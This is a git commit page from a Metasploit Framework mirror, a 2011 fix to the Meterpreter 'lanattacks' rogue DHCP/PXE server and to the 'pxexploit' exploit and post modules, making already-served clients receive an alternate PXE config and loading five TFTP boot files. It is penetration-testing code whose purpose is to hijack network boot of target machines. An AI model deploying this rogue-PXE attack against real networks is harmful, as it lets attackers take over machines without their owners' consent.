infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixes #5312 for pivoted PXE attacks. 

git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Weeks 2011-08-25 02:07:35 +00:00
parent 53e43fa847
commit 06c3dabe31
5 changed files with 13 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/meterpreter/ext_server_lanattacks.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll Normal file
View File

Binary file not shown.

12
external/source/meterpreter/source/extensions/lanattacks/dhcpserv.cpp vendored
View File

@ -222,6 +222,9 @@ int DHCPserv::run(){
string pxeConfigFile("update2"); string pxeConfigFile("update2");
stringOptionCheck(&pxeConfigFile, "PXECONF"); stringOptionCheck(&pxeConfigFile, "PXECONF");
string pxeAltConfigFile("update0");
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
string pxePathPrefix(""); string pxePathPrefix("");
//get DHCP parameters //get DHCP parameters
unsigned int leaseTime = 600; unsigned int leaseTime = 600;
@ -336,10 +339,6 @@ int DHCPserv::run(){
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
pkt << DHCPOffer; pkt << DHCPOffer;
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
continue; //Already served; allowing normal boot
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK }else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
pkt << DHCPAck; pkt << DHCPAck;
@ -360,6 +359,11 @@ int DHCPserv::run(){
pkt << dhcpoption(OpDns, iton(dnsServer)); pkt << dhcpoption(OpDns, iton(dnsServer));
string pxemagic(PXEMagic,4); string pxemagic(PXEMagic,4);
pkt << dhcpoption(OpPXEMagic, pxemagic); pkt << dhcpoption(OpPXEMagic, pxemagic);
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
else
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile); pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix); pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime)); pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));

4
modules/exploits/windows/misc/pxexploit.rb
View File

@ -93,8 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Loading DHCP options...") print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore) client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i| 0.upto(4) do |i|
print_status("Loading file #{i} of 4") print_status("Loading file #{i+1} of 5")
if i < 4 if i < 4
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
else else

4
modules/post/windows/manage/pxexploit.rb
View File

@ -71,8 +71,8 @@ class Metasploit3 < Msf::Post
print_status("Loading DHCP options...") print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore) client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i| 0.upto(4) do |i|
print_status("Loading file #{i} of 4") print_status("Loading file #{i+1} of 5")
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
client.lanattacks.add_tftp_file("update#{i}",contents) client.lanattacks.add_tftp_file("update#{i}",contents)
end end